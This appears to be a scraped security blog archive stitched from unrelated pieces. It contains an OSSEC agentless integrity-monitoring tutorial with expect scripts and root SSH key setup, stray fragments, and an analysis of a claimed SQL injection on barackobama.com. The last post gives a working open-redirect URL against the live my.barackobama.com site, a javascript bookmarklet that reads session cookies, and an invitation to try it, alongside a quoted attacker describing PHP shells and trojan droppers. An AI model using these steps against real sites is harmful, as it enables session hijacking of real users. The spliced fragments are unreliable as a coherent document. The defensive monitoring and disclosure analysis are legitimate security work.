 1` && echo FWD: `stat --printf \"%s:%a:%u:%g\" \$i`:\$md5:\$sha1 \$i; done; exit\r"
send "exit\r"

Let’s break this down to see what is happening.

The send command pushes the following string to the ssh subprocess which gets run on the remote end of the connection. Before the script is sent to the remote host expect internally processes the string. This includes searching for variables and removing any control characters.

The control characters are first taken into account, and in the case of our example all escaped special characters are processed. \", \r, and \$ would be replaced with ", “carriage return“, and & respectively. The reason the escape characters are needed so that they will not interfere with expects own string processing and control. We will need to handle control characters in this way when we begin writing our own script.

While special characters were being handled by expect it also looked for variables to replace, in this case it will find $args and replace it with what ever arguments were passed to the script by the OSSEC agentless process. If we specified the following in /var/ossec/etc/ossec.conf the $args variable would be replaced with “/bin /etc /sbin“.

  <agentless>
    <type>ssh_integrity_check_linux</type>
    <frequency>3600</frequency>
    <host>root@172.17.20.20</host>
    <state>periodic</state>
    <arguments>/bin /etc /sbin</arguments>
  </agentless>

Back to the commands that get run. Once expect has completed replacement we are left with this command.

echo "INFO: Starting."; for i in `find /bin /etc /sbin 2>/dev/null`;do tail $i >/dev/null 2>&1 && 
md5=`md5sum $i | cut -d " " -f 1` && sha1=`sha1sum $i | cut -d " " -f
 1` && echo FWD: `stat --printf "%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit
exit

This script then goes and uses the Unix find command to locate all files in the specified path (from the arguments passed) and generates an OSSEC FWD: command for each one and prints it to stdout. Making use of the commands stat, md5sum, and sha1sum to generate the data needed. Here is an example of the output checking.

spawn ssh root@172.17.20.20
Last login: Wed Nov  4 11:32:51 2009 from 172.17.20.131^M
[linux26 ~]# 
INFO: Started.
echo "INFO: Starting."; for i in `find {/bin /etc /sbin} 2>/dev/null`;do tail $i >/dev/null 2>&1 && 
md5=`md5sum $i | cut -d " " -f 1` && sha1=`sh a1sum $i | cut -d " " -f
 1` && echo FWD: `stat --printf "%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit
INFO: Starting.
FWD: 833:644:0:0:4148adea745af5121963f6b731b60013:60877a6f6981b16c0d53d32bcd3f07d41cfb5bd4 /etc/modprobe.d/
glib2.sh
[...........SNIP............]
FWD: 1696:644:0:0:c2bd306b205ad9e81fb02ce6b225d384:5244d65815cb228a4fac7bc4c1c7774508fb7505 /etc/nsswitch.conf
FWD: 85179:644:0:0:8db574225cd1068b47e77ceccd96f8ff:b5ef6183b35ee9d1b66ed2cefe98003c5bd99192 /etc/sensors.conf
FWD: 49:644:0:0:52c3df2f1edf30ca3db82174be3a68d2:1934648f2429b70b1f729d343a6956fb0ea73136 /etc/php.d/imap.ini
FWD: 873:644:0:0:04559d1fe27ecd079b69df8b319f937e:e5cab1bf1f9e4bc4386309f4e00a9b7be3e543a2 /etc/php.d/memcache.ini
FWD: 59:644:0:0:94636ba6c4bac9d8d49d9de1a513ae0c:41d5164a2c6e332e40edf55c59a2d0df8a260964 /etc/php.d/pdo_mysql.ini
FWD: 49:644:0:0:917dbbafbfaaa20f660063d627123dae:0e829d4ffc69f58dc258510b4b8452412e31ccc5 /etc/php.d/json.ini
FWD: 0:644:0:0:d41d8cd98f00b204e9800998ecf8427e:da39a3ee5e6b4b0d3255bfef95601890afd80709 /etc/wvdial.conf
logout
Connection to 172.17.20.20 closed.

INFO: Finished.

Our own Agentless Script: ssh_dmz_linux

Using the built in OSSEC agentless scripts are great, but sometimes we need more focused scanning and checking. So let’s modify the ssh_integrity_check_linux for our environment.

The goals for this new script will be to watch for changes to files based on the following criteria:

• All setuid and setgid files
• All files related to authentication (including .htaccess and ssh files)
• All application specific files (apache, ssh)

Finding all setuid and setgid files

Let’s first start by identifying a method to locate all files with their setuid or setgid bits enabled. To do this we will ssh to the host 172.17.20.20 and use find to locate the files.

obsd46# sudo -u ossec ssh root@172.17.20.20
[linux26 ~]# find / -type f \( -perm -4000 -o -perm -2000 \) 
/sbin/umount.nfs
/sbin/netreport
/sbin/unix_chkpwd
/sbin/mount.nfs
/sbin/pam_timestamp_check
/sbin/mount.nfs4
/sbin/umount.nfs4
/bin/ping6
/bin/su
/bin/umount
/bin/ping
/bin/mount
/lib/dbus-1/dbus-daemon-launch-helper
/usr/libexec/openssh/ssh-keysign
/usr/libexec/utempter/utempter
/usr/sbin/usernetctl
/usr/sbin/postqueue
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/postdrop
/usr/sbin/suexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/locate
/usr/bin/wall
/usr/bin/sudoedit
/usr/bin/gpasswd
/usr/bin/lockfile
/usr/bin/newgrp
/usr/bin/write
/usr/bin/screen
/usr/bin/passwd
/usr/bin/chage
/usr/bin/sperl5.8.8
/usr/bin/crontab
/usr/bin/ssh-agent

Finding all files related to authentication and applications specific files

Finding all files with setuid and setgid was simple, but finding all files related to authentication is more invloved. This of course will vary from system to system, but this should be good starting point.

obsd46# sudo -u ossec ssh root@172.17.20.20
[linux26 ~]# find / \( -name ".ssh" -o -name "ssh" -o -name "sshd" -o -name "httpd" -o -name ".htaccess" 
-o -name "pam.d" \) -exec find {} \;
/var/www/html/admin/modules/framework/var/www/html/admin/modules/.htaccess
/etc/httpd
/etc/httpd/conf
/etc/httpd/conf.d
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/proxy_ajp.conf
/etc/httpd/conf.d/README
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf.d/welcome.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/magic
/etc/httpd/logs
/etc/httpd/modules
/etc/httpd/run
/etc/logrotate.d/httpd
/etc/pam.d
/etc/pam.d/authconfig
[...................SNIP PAM Files.....................]
/etc/pam.d/system-config-network-cmd
/etc/pam.d/vsftpd
/etc/rc.d/init.d/httpd
/etc/rc.d/init.d/sshd
/etc/ssh
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/httpd
/root/.ssh
/root/.ssh/authorized_keys
/usr/bin/ssh
/usr/lib/httpd
/usr/lib/httpd/modules
/usr/lib/httpd/modules/libphp5.so
[...................SNIP Apache modules................]

/usr/lib/httpd/modules/mod_vhost_alias.so
/usr/sbin/httpd
/usr/sbin/sshd
/usr/src/tbm-pbxconfig-5.5.1/amp_conf/htdocs/admin/modules/framework/htdocs/admin/modules/.htaccess
/usr/src/tbm-pbxconfig-5.5.1/amp_conf/htdocs/admin/modules/.htaccess
/var/empty/sshd
/var/empty/sshd/etc
/var/empty/sshd/etc/localtime
/var/www/html/admin/modules/framework/var/www/html/admin/modules/.htaccess
/var/www/html/admin/modules/.htaccess

Merging finds

Now we have two basic find methods that identify the files we want to monitor for changes, but our finds were a little greedy so we should create a way to strip out unwanted files from the list. As this is a unix system egrep is the king for finding or removing items from a list. To simplify things we can use egrep with the -v command line argument which tells egrep NOT to print any matching items.

Just to make sure that we do not end up double processing files we can make use of the sort command with -u argument to remove any duplicates.

Here is how we would put together both finds, egrep, and sort to locate and filter what is needed.

(find / -type f \( -perm -4000 -o -perm -2000 \) && \find / \( -name ".ssh" -o -name "ssh" -o -name "sshd" 
-o -name "httpd" -o -name ".htaccess" -o -name "pam.d" \) -exec find {} \; ) 2>/dev/null | egrep 
-v "known_hosts|moduli|var\/log|var\/lock" | sort -u

The above command we have found all files and paths that we would like to monitor, but this still needs to be integrated into a script on the OSSEC server.

Creating ssh_dmz_linux

We don’t want to make changes to ssh_integrity_check_linux directly so we will need to make a copy.

obsd46# (cd /var/ossec/agentless && cp ssh_integrity_check_linux ssh_dmz_linux)

Integrating our new command line into the script we must pay close attention to special characters that expect will process. Due to this we will need to escape all / and " by proceeding them with \. Once we are done escaping we just insert our new line in place of find $args 2>/dev/null in our new file.

Here is what the completed script will look like.

obsd56# cat /var/ossec/agentless/ssh_dmz_linux
 #!/usr/bin/env expect

 # @(#) $Id: ssh_integrity_check_linux,v 1.11 2009/06/24 17:06:21 dcid Exp $
 # Agentless monitoring
 #
 # Copyright (C) 2009 Trend Micro Inc.
 # All rights reserved.
 # 
 # This program is a free software; you can redistribute it
 # and/or modify it under the terms of the GNU General Public
 # License (version 3) as published by the FSF - Free Software
 # Foundation.


 # Main script.
source "agentless/main.exp"


 # SSHing to the box and passing the directories to check.
if [catch {
    spawn ssh $hostname
} loc_error] {
    send_user "ERROR: Opening connection: $loc_error.\n"
    exit 1;
}


source $sshsrc
source $susrc

set timeout 600
send "echo \"INFO: Starting.\"; for i in `(find / \\( -name \".ssh\" -o -name \"ssh\" -o -name \"sshd\" 
-o -name \"httpd\" -o -name \".htaccess\" -o -name \"pam.d\" \\) -exec find {} \\; && find / -type f 
\\( -perm -4000 -o -perm -2000 \\); ) 2>/dev/null | egrep -v \"known_hosts|moduli|var\\/log|var\\/lock\" | sort -u`;
do tail \$i >/dev/null 2>&1 && md5=`md5sum \$i | cut -d \" \" -f 1` && sha1=`sha1sum \$i | cut -d \" \" 
-f 1` && echo FWD: `stat --printf \"%s:%a:%u:%g\" \$i`:\$md5:\$sha1 \$i; done; exit\r"
send "exit\r"

expect {
    timeout {
        send_user "ERROR: Timeout while running commands on host: $hostname .\n"
        exit 1;
    }
    eof {
        send_user "\nINFO: Finished.\n"
        exit 0;
    }
}

exit 0;

Testing

Before we add this new script to OSSEC configuration we need to test it.

obsd46# (cd /var/ossec && sudo -u ossec ./agentless/ssh_dmz_linux root@172.17.20.20 )

ERROR: ssh_integrity_check <hostname> <arguments>

Due to not making use of the of the $arg variable in the way that ssh_integrity_check_linux wants use too, this caused this the problem above. Solving this problem would require making changes to files that will effect other built in scripts. So a quick solution is to just pass anything as an argument to the script. This will have no effect on our script as we do not make use of the $arg variable.

obsd46# (cd /var/ossec && sudo -u ossec ./agentless/ssh_dmz_linux root@172.17.20.20 NOTUSED)
spawn ssh root@172.17.20.20
Last login: Wed Nov  4 13:46:32 2009 from 172.17.20.131^M
[linux26 ~]#  
INFO: Started.
echo "INFO: Starting."; for i in `(find / \( -name ".ssh" -o -name "ssh" -o -name "sshd" -o -name "httpd" 
-o -name ".htaccess" -o -name "pam.d" \)  -exec find {} \; && find / -type f \( -perm -4000 -o -perm -2000 
\); ) 2>/dev/null | egrep -v "known_hosts|moduli|var\/log|var\/lock"`;do tail $i >/dev/null 2>&1 &&
 md5=`md5s ^Mum $i | cut -d " " -f 1` && sha1=`sha1sum $i | cut -d " " -f 1` && echo FWD: `stat --printf 
"%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit
INFO: Starting.
FWD: 14:775:100:101:3bc0a3e92f8170084dd102eda9a474b1:25a1783a3c6bdd9745ec245ec1bfa0414ee05d23 /var/www/html/admin/modules/.htaccessmodules/.htaccess
FWD: 3519:644:0:0:e4ca381035a34b7a852184cc0dd89baa:6e43d0b5a46ed5ba78da5c7e9dcf319b27d769e7 /var/empty/sshd/etc/localtime
FWD: 560:644:0:0:58370830ecfa056421ad21aff9c18905:d115bb5aeefaab97c53fbbd5df84ebcb9170d796 /etc/httpd/conf.d/php.conf
[...................SNIP.............................]
FWD: 392:644:0:0:e92bea7e9d70a9ecdc61edd7c0a2f59a:d77b61dac010c60589b4d8a2039e3b8a5bed18b2 /etc/httpd/conf.d/README
FWD: 70888:4711:0:0:9046bd13339e7ef22266067b633e601a:3fc41029ddb14fe4ed613f479fa9e89c944f04dd /usr/bin/sperl5.8.8
FWD: 315416:6755:0:0:4c63a9709fb7f0f97c30aa29d204859c:c379efa658de72866b8f6de5767906ff78d127b0 /usr/bin/crontab
FWD: 88964:2755:0:99:baf3ebef6377d6ef42858776c33621b0:62394bf57d18c3fd49adeb39a1da61661cabc3c8 /usr/bin/ssh-agent
logout
Connection to 172.17.20.20 closed.

INFO: Finished.

Going live

We have created a new OSSEC agentless script and I am going to enable this script using the ossec-hids-tools that I introduced in my last post about ossec (OSSEC: Agentless to save the day). Also a restart of OSSEC will also be needed for the changes to take effect.

obsd46# ossec-config --section agentless --add --host root@172.17.20.20 --type ssh_dmz_linux 
--state periodic --argv "NOTUSED"
obsd46# /var/ossec/bin/ossec-control restart                                                                                                        (root@jcli-1:/var/ossec)
Killing ossec-monitord .. 
Killing ossec-logcollector .. 
Killing ossec-remoted .. 
Killing ossec-syscheckd .. 
Killing ossec-analysisd .. 
Killing ossec-maild .. 
ossec-execd not running ..
Killing ossec-agentlessd .. 
OSSEC HIDS v2.2 Stopped
Starting OSSEC HIDS v2.2 (by Trend Micro Inc.)...
Started ossec-agentlessd...
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...
Completed.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

Lois, Clark Kent may seem like just a mild-mannered reporter, but listen, not only does he know how to treat his editor-in-chief with the proper respect, not only does he have a snappy, punchy prose style, but he is, in my forty years in this business, the fastest typist I’ve ever seen.

Perry White

Michael Starks from Immutable Security published the “Week of OSSEC” all last week (find their links at the end of article), and it was a great setup of posts.

With all the hard work done by Michael in his “Week of OSSEC”, I figured I should follow up with a few posts of my own about this great tool. I am NOT going to do a week of posts, but will try to get as much information out as I can.

OSSEC

OSSEC is a Host Intrusion Detection System (HIDS) in name, but in reality it is far more. It’s able to look for rootkits, monitor logs (LIDS), and even actively respond to defined events. While all these features are great, the unsung hero is agentless monitoring.

Agentless security monitoring is really a great feature that does not get explored often enough, so I am going to show how to get it up and running and then get it monitoring remote hosts.

Installing OSSEC

This is going to be one of the fastest OSSEC install instructions on the internet. For full details the main OSSEC website which covers this topic with more detail. Key things to note here is that I have installed it as a server. I could have installed OSSEC locally and we would have still been able to do whatever was needed.

My install log for OSSEC 2.2 is here.

Enabling agentless

To make use of agentless security monitoring, it first needs to be enabled. Full details also on the OSSEC webpage.

Agentless Requirements

For most of the built-in agentless monitoring scripts, expect is needed to function. In this example on OpenBSD 4.5, adding the expect package is simple with pkg_add.

obsd46# pkg_add http://openbsd.mirror.frontiernet.net/pub/OpenBSD/4.5/packages/i386/expect-5.43.0p0-no_tk.tgz
tcl-8.4.19: complete
expect-5.43.0p0-no_tk: complete
--- tcl-8.4.19 -------------------
You may wish to add /usr/local/lib/tcl8.4/man to /etc/man.conf

Turning on Agentless

Now we need to enable agentless by running the following command:

obsd46# /var/ossec/bin/ossec-control enable agentless

Adding a host.

We need to add a host to agentlessly monitor. If we were to authenticate using a password for host 172.17.20.20 we would use the following:

obsd46# /var/ossec/agentless/register_host.sh add agentless@172.17.20.20

While using a password does work, the preferred method would be to use SSH keys to provide the access level needed. To setup that method of access, you first need to create ssh keys for the user ossec which is the account the agentless scripts runs as.

obsd46# sudo -u ossec ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/var/ossec/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /var/ossec/.ssh/id_rsa.
Your public key has been saved in /var/ossec/.ssh/id_rsa.pub.
The key fingerprint is:
b8:c3:47:9a:33:09:5c:eb:54:a0:82:39:a6:06:63:08 ossec@obsd45.ptnsecurity.com
The key's randomart image is:
+--[ RSA 2048]----+
|E     .          |
|oo   . .         |
|Bo. . . .        |
|=o o . +         |
|..  o + S        |
|.    = *         |
|      @ .        |
|       =         |
|                 |
+-----------------+

Now that the SSH keys are present, we can add the host without a password. The special command line argument used with register_host.sh is NOPASS in all capitals, which will tell OSSEC supplied scripts to make use of SSH keys.

obsd46# /var/ossec/agentless/register_host.sh add root@172.17.20.20 NOPASS

Enabling SSH key on the host to be monitored.

You will now need to securely get the contents of /var/ossec/.ssh/id_rsa.pub to 172.17.20.20.

Using SSH and the password for a single time will make this simple. This will create the /root/.ssh if it is not already created, but might throw an error as it does if the directory is already present. This is not a problem and can be ignored.

obsd46# cat /var/ossec/.ssh/id_rsa.pub | ssh root@172.17.20.20 "( mkdir /root/.ssh/;  cat - >> /root/.ssh/authorized_keys )"
root@172.17.20.20's password:
mkdir: cannot create directory `/root/.ssh/': File exists
obsd46# ssh root@172.17.20.20 "cat  /root/.ssh/authorized_keys "
root@172.17.20.20's password:
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzyTBo7CqkI0TISR9S+KPS/gYY60nkD7Qe8wTTXrAEFvPNFJ
NJJpVVKsij6zw86lvTZ6hx9ib1M+MXvt+70uF/z1hYwnYrczR2TR03Z5nwOUA9OK61nBWXVwCi9GsQs6Oeo
mY9vkBDoKzB52+TKKSk9ZoC+HYPiT5SaiHZvMOV7kWuwF67lnYwlG5FdkRdOiXp7DcRjje4/Hixg7RLLl7o
dEXpIakzGfalt3yQDmwvSUZhyg3OuoKimTeNiKU/jlHlmEPuDZpiQe6QhFH38EeEIZTdHsYITodl8sY+n9I
eNMalGIHPs+bph+qcK+6cOb1RGaeGqJBFjaqPUyismz0bw== ossec@obsd45.ptnsecurity.com

We can also verify that it worked with the following command.

obsd46# sudo -u ossec ssh root@172.17.20.20
The authenticity of host '172.17.20.20 (172.17.20.20)' can't be established.
RSA key fingerprint is 14:cd:f2:e9:c3:5b:07:28:68:75:a7:b5:88:c2:6b:77.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.17.20.20' (RSA) to the list of known hosts.
Last login: Tue Oct  6 12:40:05 2009 from 172.17.20.154
[linux26.ptnsecurity.com ~]# exit

Add the agentless host to ossec.conf

While we have setup and prepared everything to allow agentless security monitoring of 172.17.20.20 we have not told ossec to make use of it. To simplify adding agentless to the config, we are going to make use of the python library and tools I created ossec-hids-tools.

First, let’s check to see what agentless hosts have been configured, and just like a good unix program, it should not output anything if nothing happens.

obsd46# ossec-config --section agentless --show

Next, add our host to the configuration. I am using the OSSEC supplied script ssh_integrity_check_linux. This script will login to the remote host and send back to the OSSEC server via stdout an MD5 and SHA1 hash of every single file inside the paths specified in the arguments. To demonstrate the output from the server, let’s test the script and review said output.

All testing of agentless scripts must be run from the directory /var/ossec/ unless you compiled a different install location.

obsd46# cd /var/ossec
obsd46# sudo -u ossec ./agentless/ssh_integrity_check_linux root@172.17.20.20 /etc
spawn ssh root@172.17.20.20
Last login: Mon Nov  2 17:53:23 2009 from 172.17.20.131
[tss-uvc-01v.ptn.local ~]#
INFO: Started.
t -d " " -f 1` && echo FWD: `stat --printf "%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit md5=`md5sum $i | cut -d " " -f 1` && sha1=`sha1sum $i | cu
INFO: Starting.
FWD: 14612:644:0:0:509377d820692110c7a6cc83ef2c2da8:bf610c1fa14d84d8b3b44ec80b81788457f77420 /etc/sound/events/gtk-events-2.soundlist
FWD: 22291:644:0:0:d6139aa9554d4997ea25ec2d56095f51:26b9ae7784943eecaeb2dcd4b2ae3a32371d61c8 /etc/sound/events/gnome-2.soundlist
FWD: 83:644:0:0:9f87609f65b51761657c7d67881ae582:de82c03c535e9deb16aed94153883280891da2d7 /etc/modprobe.d/blacklist-firewire
^C^C#

I only let the script run for a few seconds to see the output, but the key things to notice are the lines beginning with “INFO” or “FWD”.

Anything that starts with “INFO” is logged to the /var/ossec/logs/ossec.log file for debugging and troubleshooting, we will make use of this later on in this blog. The “FWD” tag at the beginning of the line lets the OSSEC server store the HASH information. Where this becomes useful is when a file’s contents change, the HASH will in turn change and OSSEC is able to notify you when this happens.

Now let’s complete adding our host to the OSSEC configuration.

obsd46# ossec-config --section agentless --add --host root@172.17.20.20 --type ssh_integrity_check_linux \
--state periodic --argv "/bin /etc /sbin"

Let’s verify it’s what we expect.

obsd46# ossec-config --section agentless --show

type: ssh_integrity_check_linux
frequency: 3600
host: root@172.17.20.20
state: periodic
arguments: /bin /etc /sbin

Time to restart the deamons for the changes to take effect.

obsd46# /var/ossec/bin/ossec-control stop
Killing ossec-monitord ..
Killing ossec-logcollector ..
ossec-remoted not running ..
Killing ossec-syscheckd ..
Killing ossec-analysisd ..
Killing ossec-maild ..
ossec-execd not running ..
ossec-agentlessd not running ..
OSSEC HIDS v2.2 Stopped
obsd46# /var/ossec/bin/ossec-control start
Starting OSSEC HIDS v2.2 (by Trend Micro Inc.)...
Started ossec-agentlessd...
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...
Completed.

Testing agentless

Checking the log files, we can see what the agentless security monitor has done so far.

obsd46# grep agentless logs/ossec.log
2009/09/21 14:59:49 ossec-agentlessd: INFO: Started (pid: 15320).
2009/09/21 14:59:51 ossec-agentlessd: INFO: Test passed for 'ssh_integrity_check_linux'.
2009/09/21 15:00:53 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Started.
2009/09/21 15:00:53 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Starting.
2009/09/21 15:01:34 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Finished.

Now we have one last thing to do to see that it’s working as expected, make a change to the file system on 172.17.20.20 that the ossec will notice on the next run. I am going to change the root password for now.

obsd46# ssh -i /var/ossec/.ssh/id_rsa root@172.17.20.20
Last login: Tue Oct  6 14:38:48 2009 from 172.17.20.154
[linux26.ptnsecurity.com ~]# passwd
Changing password for user root.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[linux26.ptnsecurity.com ~]# exit

Take a look at the logs for ossec-agentlessd to check the host. Again, we see that it completed another scan.

obsd46# grep agentless logs/ossec.log
2009/09/21 15:18:27 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Started.
2009/09/21 15:18:27 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Starting.
2009/09/21 15:18:46 ossec-syscheckd: INFO: Finished creating syscheck database (pre-scan completed).
2009/09/21 15:19:06 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Finished.

Note that we also received the following email notifying that the password has changed, a message that is very useful to report.

OSSEC HIDS Notification.
2009 Sep 21 15:19:00

Received From: (ssh_integrity_check_linux) root@172.17.20.20->syscheck
Rule: 550 fired (level 7) -> "Integrity checksum changed."
Portion of the log(s):

Integrity checksum changed for: '/etc/shadow'
Old md5sum was: '0d92e12c92f3edcf9d8876ea57c5f677'
New md5sum is : '2bd51b61dea17c5682fb2c0cf4f92c63'
Old sha1sum was: '2270c03a920ef8dd50e11cefdef046a8660f7a29'
New sha1sum is : 'd9518ea9022b10d07f81925c6d7f2abb4364b548'

--END OF NOTIFICATION

Week of OSSEC Links:

• Day 1: Detecting World-Writable Files
• Day 2: Detecting New Files
• Day 3: Using Variables
• Day 4: Using Groups
• Day 5: Reusing Rule IDs
• Day 6: Developing a Tuning Strategy
• Day 7: Developing a Workflow

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

If you really like it you can install this Warp Bookmarklet to quickly jump to Warp from any YouTube video. Right click on the link ‘this bookmarklet’ in the previous sentence and select Add to Favorites or Bookmark this Link, and place the link in the browser’s toolbar.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• Microsoft IE 6 & 7 Zero-day (Aside)
• March’s Patch Tuesday
• Press F1 for Help, pwned.

“We have a table admin. And in this table we can see that the admin passwords are in PLAIN TEXT! The website is big, with many sections, and there are 19 admins. What else we need to get full access on the website? Nothing. After we log in as admins, we can virtually do anything we want with the website: upload PHPShells, redirects, infect pages with Trojan droppers, [and even deface the whole website],” – Unu

Speculative holes become apparent in reading the blog entry. The blog states and Pangolin shows that the database backend to the site is MS Access. Why would a professionally built web site (the site was built by a firm called Blue State Digital), use MS Access to store data? The Obama donation site, like the other sites built by Blue State Digital, is PHP based and appears to use the Expression Engine content management system (CMS) by EllisLab’s. Expression Engine uses MySQL, another problem. Finally, the donate.barackobama.com web site does not have user ids and passwords, it takes contributions directly from a form the user fills out.

Pangolin screenshot supposedly demonstrating SQL Injection of Obama web site.

Officials with responsibility around the web site responded similarly. Hari Sevugan of the DNC stated that “based on the number of incorrect assertions, we do not think that this information is credible. There has been no security breach”. Jascha Franklin-Hodge the CTO at Blue State Digital followed with: “After careful review, we are confident that the screenshot included in this bug does not contain any data from the barackobama.com or any other site hosted by Blue State Digital, the DNC, or Organizing for America. Microsoft Access is not used in any capacity on the barackobama.com site or servers.”

Not everybody agreed as of this morning. Chet Wisniewski of Sophos posted the following, based largely on Unu’s other successful exploits: The Tech Herald is reporting that they have spoken to the Democratic National Committee who deny Obama’s site was hacked. This is not surprising, and I believe is also incorrect. The usernames all match up with Obama staffers and campaign staff, which if the screenshot posted by Unu was mocked up would be a lot more work than most scammers would bother with.
Source: http://www.sophos.com/blogs/chetw/g/2009/10/26/obama-vulnerable-sql-injection-headline/

So what site did Unu the researcher pop?

Here is Roosevelt University’s calendar. We were led here by the keywords showing up in the Pangolin screenshot. Fingerprinting the calendar application at Roosevelt University shows that it is an Active Server Pages application relying on an MS Access database. Errors on the calendar application reference the MS Access ODBC driver. So we’ve found the MS Access database in question. One of the admin accounts in the screenshots is id: webmaster pw: calAdmin…, or calendar administrator. Looking at the calendar itself on the Roosevelt U web site, the abbreviation CCL shows up, standing for “Center for Campus Life”. Looking again at the list of ids, there is a cclschadmin, likely Center for Campus Life scheduling administrator or something similar.

Why did Unu start at one site and end up popping another?

Google cache provides us the answer.

How the sites are linked.

Identifying the SmartProxy code as common to all web sites by Blue State Digital

So what’s the vulnerability?

It is not nearly as headline grabbing as the potential to steal login credentials from Obama donors, but until it was corrected at some point recently, the ability to redirect to any web site from donate.barackobama.com or any of the other sites mentioned above was not a good thing. Why?

First, it is a common technique of phishers or anyone attempting to get users to input information at a URL to try to make the domain look as legitimate as possible. When a bad actor can send out e-mails that are prefaced with the actual Obama donation site URL, but actually load any other web site to accept information, it makes masquerading as a legitimate web site that much easier.

Second and more important though is that the cookies from any of these web sites can be read by the site that is redirected to, because according to the browser you are still under donate.barackobama.com. On sites that don’t have credentials, like the donate site, this is not really an issue. But other sites in the family, such as my.barackobama.com do accept user registrations, and have login/password authentication. A cookie called PHPSESSID is set. If a bad actor can get a user to click on a link under the my.barackobama.com domain that actually redirects to his web site, he can read this session cookie, set it himself, and be logged in as that user on the barackobama.com web site. How hard would it be to get logged in users on the site to click a link? You are allowed to set up a blog on the web site, write one story and direct people to a link in the story.

At one point last year, you would not even have had to do that, the community blogs section of the site was redirecting to Hilary Clinton’s web site because of a vulnerability where HTML characters were allowed in the blog entries. This allowed a bad actor to inject Javascript into the pages which would be executed as part of the page load by subsequent users. The Javascript included a redirect, and Barack Obama was now advertising for Hilary Clinton based apparently on the actions of a mischievous Illinoisan.

Want to try reading your my.barackobama.com session cookie on another web site?

Create an id at my.barackobama.com. Force the site to redirect using the /smartproxy/, for example: http://my.barackobama.com/page/smartproxy/www.google.com. You’re now on Google, but check out what cookies you can read. There are a number of ways to do this but here is an easy one, a Javascript bookmarklet:

<a href=
         "javascript:(function(){x=window.open();x.document.write(&#39;%3Cht&#39;+&#39;
ml%3E/r%3Che&#39;+&#39;ad%3E%3Ctitle%3EDisplay%20Cookies%3C/title%3E%3C/he&#39;+&#39;ad
%3E%3Cbo&#39;+&#39;dy%3E&#39;);if%20(document.cookie%20==%20&#39;&#39;)%20x.document.write(
&#39;
No%20Cookies%20Found&#39;);%20else%20{thisCookie%20=%20document.cookie.split(&#39;;%20&#39;);
%20for%20(i=0;%20i%3CthisCookie.length;%20i++)%20{x.document.write(thisCookie[i]%20+%20&#39;%3Cb
r%20//%3E&#39;);}}x.document.write(&#39;%3C/bo&#39;+&#39;dy%3E%3C
/ht&#39;+&#39;ml%3E&#39;);x.document.close();})()">
            Display Cookies</a>

To add the bookmarklet, right click on this link and select Add to Favorites or Bookmark this Link. When on the redirected Google site, click the bookmark you’ve created, you should see your PHPSESSID from the my.barackobama.com web site.

This problem now appears to be fixed for the most part. Google as a redirect still works, but many other sites at this point will not, producing the following error:

ERROR: attempt to proxy page from a host not on the allow list. access denied.

This would indicate that a white list of allowed hosts has been set up.

Not the Same Server

The Tech Herald reported the following earlier today:

“Unu has apparently accessed a database on the same server that is unrelated to President Obama’s site…If so, we asked why an SQLi from President Obama’s site allowed access to the Access database…While this is pure speculation on our part, perhaps the DNC is correct. It is possible that Unu has in fact accessed the database for a different site entirely that resides on the same server”

Source: http://www.thetechherald.com/article.php/200944/4682/Researcher-discloses-SQL-Injection-flaw-on-barackobama-com

The Roosevelt University website is hosted in Englewood Colorado by NTT America, the Barack Obama donation website is hosted in Washington, D.C. by Internap Network Services on behalf of Blue State Digital. The web sites are not hosted on the same server.

Who’s Unu?

Unu, apparently from Bucuresti Romania, says that for him penetration testing and finding vulnerabilities is a hobby and a passion. His blog, a testament to the results of his hobby, is a compilation of the results of successful SQL Injection attacks against web sites like BNP Paribas, Credit Agricole in France, Royal Bank of Scotland’s WordPay, Poste Italiane (the Italian Postal Service) and others as well as examples of successful parameter manipulation and other web application vulnerabilities. He appears to practice a version of responsible disclosure in that he has notified the organizations mentioned on the blog and explained the problems. His blog, and its disclosures, are interesting reading for the security professional and thus we encourage you to have a look.

The site he publishes to is hosted on Baywords, a blog platform notable in that it was formed to combat what it sees as censorship by other platforms such as WordPress (the platform founders state they set up the service after a friend of theirs was closed down by Wordpress for a TOS violation.

What is Pangolin?

